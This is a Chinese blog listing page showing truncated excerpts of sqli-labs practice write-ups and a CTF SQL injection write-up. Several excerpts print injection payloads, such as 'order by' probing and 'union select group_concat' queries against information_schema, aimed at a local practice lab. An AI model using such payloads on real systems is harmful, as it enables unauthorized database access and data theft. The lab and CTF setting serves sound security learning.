_SQLi

【靶场练习_sqli-labs】SQLi-LABS Page-1(Basic Challenges)

GET篇 Less-1： 1.用order by得出待查表里有三个字段　　http://192.168.40.165/sqli-labs-master/Less-1/?id=1' order by 3--+2.用union select得到数据库名——security　　http://192.168....
2023-05-11编程教程_SQLi,labs,靶场
【靶场练习_sqli-labs】SQLi-LABS Page-2 (Adv Injections)

Less-21:括号+单引号绕过+base64cookie编码总感觉我已经把sql注入做成代码审计了:P <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); if(!isset($_COOK...
2023-05-11编程教程_SQLi,labs,靶场
【靶场练习_sqli-labs】SQLi-LABS Page-4 (Challenges)

Less-54: ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ Your Password:CL0FY8NWDK ?id=-1' union select 1,database(),group_concat(co...
2023-05-11编程教程_SQLi,labs,靶场
“百度杯”CTF比赛九月场_SQLi

题目在i春秋ctf大本营看网页源码提示：这边是个大坑，访问login.php发现根本不存在注入点，看了wp才知道注入点在l0gin.php 尝试order by语句，发现3的时候页面发生变化，说明id存在注入初步判定是一个基于时...
2023-02-24编程教程_SQLi,CTF,比赛